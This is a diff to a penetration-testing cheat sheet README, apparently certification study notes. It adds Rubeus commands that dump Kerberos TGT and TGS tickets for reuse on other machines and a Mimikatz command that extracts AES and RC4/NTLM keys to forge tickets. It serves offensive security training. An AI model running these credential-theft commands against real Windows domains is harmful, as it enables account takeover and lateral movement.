haivan7/CPTS-cheatsheet/README.md

 # Harvesting Kerberos tickets from Windows by Rubeus   ( it wil export ticket to file .kirbi )
 Rubeus.exe dump /nowrap

+# Export TGT to base64 string for use on other machines
+.\Rubeus.exe dump /luid:0xfc4b4c /service:krbtgt /nowrap

+# Export TGS to base64 string for use on other machines
+.\Rubeus.exe dump /luid:0x98b07 /service:cifs /nowrap

 (when Exported tickets fail or ticket has expired , we can run below command to extracted Encryption Keys to generate new tickets )
 # Mimikatz - Extract Kerberos keys  ( we can get AES256_HMAC and  RC4_HMAC key )  ( RC4_HMAC same NTLM hash)
 mimikatz.exe privilege::debug "sekurlsa::ekeys" exit